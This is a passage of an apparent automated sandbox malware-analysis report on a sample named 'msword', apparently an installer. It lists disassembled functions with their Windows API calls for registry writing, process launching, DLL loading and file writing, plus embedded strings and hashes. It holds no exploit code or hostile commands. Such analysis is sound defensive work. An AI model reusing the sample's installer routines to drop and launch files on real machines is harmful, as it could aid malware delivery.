                                                                            • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                            • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                            • DeleteObject.GDI32(?), ref: 0040116E
                                                                            • EndPaint.USER32(?,?), ref: 00401177
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                            • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                            • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                            • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                            APIs
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                            • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                            • API String ID: 1641139501-220328614
                                                                            • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                            • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                            • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                            • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                            Strings
                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                            • String ID: created uninstaller: %d, "%s"
                                                                            • API String ID: 3294113728-3145124454
                                                                            • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                            • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                            • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                            • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3734993849-2769509956
                                                                            • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                            • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                            • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                            • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                            Strings
                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                            • hZ, xrefs: 00402473
                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                            • String ID: hZ$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                            • API String ID: 1033533793-2870239994
                                                                            • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                            • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                            • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                            • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                            • GetSysColor.USER32(00000000), ref: 00403E00
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                            • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                            • GetSysColor.USER32(?), ref: 00403E2B
                                                                            • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                            • DeleteObject.GDI32(?), ref: 00403E55
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                            • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                            • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                            • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                              • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                            Strings
                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                            • Exec: command="%s", xrefs: 00402241
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                            • API String ID: 2014279497-3433828417
                                                                            • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                            • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                            • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                            • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                            • GetMessagePos.USER32 ref: 00404871
                                                                            • ScreenToClient.USER32(?,?), ref: 00404889
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                            • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                            • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                            • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                            • MulDiv.KERNEL32(00022000,00000064,?), ref: 00403295
                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                             • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                            • wsprintfW.USER32 ref: 00404457
                                                                            • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$@rD
                                                                            • API String ID: 3540041739-1813061909
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":
                                                                            • API String ID: 589700163-165019052
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1912718029-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            APIs
                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
